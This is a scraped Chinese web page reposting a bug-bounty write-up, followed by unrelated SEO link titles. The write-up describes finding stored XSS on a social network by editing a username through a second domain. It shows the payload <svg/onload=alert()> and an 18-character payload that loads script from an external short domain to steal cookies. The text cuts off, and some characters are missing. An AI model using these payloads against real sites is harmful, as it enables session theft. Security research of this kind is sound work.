当前位置: 首页 > news >正文

哪些网站做的美剧广东建设职业注册中心网站

哪些网站做的美剧,广东建设职业注册中心网站,网站内容图片怎么做的,肇庆网站建设大家好,这是我编写的第一篇文章,之所以会分享这个故事,是因为我花了几个晚上的时间,终于找到了解决某个问题的方法。故事如下: 几个月前,我被邀请参加一个非公共的漏洞悬赏项目,在初期发现了一些…

671d8b072d0c52232aa0131a2adb239d.png

大家好,这是我编写的第一篇文章,之所以会分享这个故事,是因为我花了几个晚上的时间,终于找到了解决某个问题的方法。故事如下:

几个月前,我被邀请参加一个非公共的漏洞悬赏项目,在初期发现了一些漏洞后,就再无收获。

而在最后5天里,出于对金钱的渴望,我告诉自己必须在整个项目结束之前再找到一些漏洞,因此我又从头开始梳理整个目标。

这个目标是一个大型的社交网络,而转折就发生在我去创建一个新的帐户时。

当我在用户名处输入一个XSS的payload时,特殊字符: <:’();?>全不能输入,而且长度限制为20个字符。

e21a99dfad32ce4b25e527ee62777ff8.png

此时,我没有太好的办法,只能去寻找其他漏洞。

而当我访问目标范围内的第二个域名,试图用我的电子邮件注册新帐户时,被告知:用户已经注册,请登录。看来,这两个网站使用的是同一个数据库的用户数据,那么我可以借这个网站插入XSS么?

我很快进入到“个人资料”页面,尝试编辑我的用户名。是的,的确没有了敏感字符限制!

但是,这个长度还是被限制在20个字符以内。

我首先输入一个简单的payload来确认XSS的存在:<svg/onload=alert()>,这个长度为20个字符。

输入并保存后,我转向第一个网站,并成功在“个人资料”页面发现了弹框!

接下来,我开始探究如何窃取cookie,因为危害越大,奖励越高。

不过由于无法绕过长度限制,所以如何才能用小于20个字符的XSS来窃取cookie?xsshunter工具的确很有用,但payload都太长了,所以我花费了很久的时间不停寻找新方法。48小时之后,我发现了这条来自2016年的推特,其中的payload的确很短,来自@0x6D6172696F:

a36e39cabe98d16e24fe23ce8e0e5458.png

<script/src=//⑭.₨>,只有18个字符。其中代表印度卢比,这是1个字符,而不是2个字符,而也是类似的效果。当你访问把这个url粘贴到浏览器去访问时,会发现如下情形:

33eff7650d91860c7c64e0c551fb4a75.png
http://www.yayakq.cn/news/668755/

相关文章:

  • 国内网站做得好的公司上海工程相关的公司
  • dede笑话网站源码职业生涯规划大赛ppt
  • 网站网页制作模板修改wordpress插件怎么用
  • 网站设计规范西安比较厉害的软件公司
  • 英文 网站 字体云服务器租赁
  • 电子商务网站建设是学什么软件推广价格一般多少
  • 网站建设 类郑州厉害的seo优化顾问
  • 公司内部网站创建企业网站托管一年多少钱
  • 网站建设及维护保密协议金色世纪做网站的是哪个岗位
  • 网站怎么做超链接me域名网站
  • 梁山做网站宝安营销型网站制作
  • php5 mysql网站开发基础与应用大数据技术与应用
  • 网站子站怎么建设什么是二级域名网站
  • vi设计欣赏网站免费网站设计素材
  • 淄博便宜网站设wordpress 嵌入 php代码
  • 网站建设教程asp网站建设需要那种技术
  • 网站设计 psd软件开发流程流程图
  • 江西省飞宏建设工程有限公司 网站网页微信扫码登录
  • 网站优化步骤自考本科含金量高吗
  • 个人如何做网站建设信息港查询
  • 政务公开 加强门户网站建设旅游网站设计模板图片
  • 设计一个企业网站报价网站建设公司哪家强
  • 网站如何建设二级域名代理wordpress p=
  • 临沂做网站的公司有哪些红谷滩园林建设集团网站
  • 如何建做校园购物网站市场营销网站建设
  • vs2017 做网站微信公众号商城搭建
  • 为什么一个人做网站有难度长春网站建设案例
  • 网站建设技术方案模板海淀做网站设计的公司
  • 能不能不用虚拟主机建设网站wordpress小工具里的用户中心
  • 网站怎么优化排名wordpress如何添加注册登录界面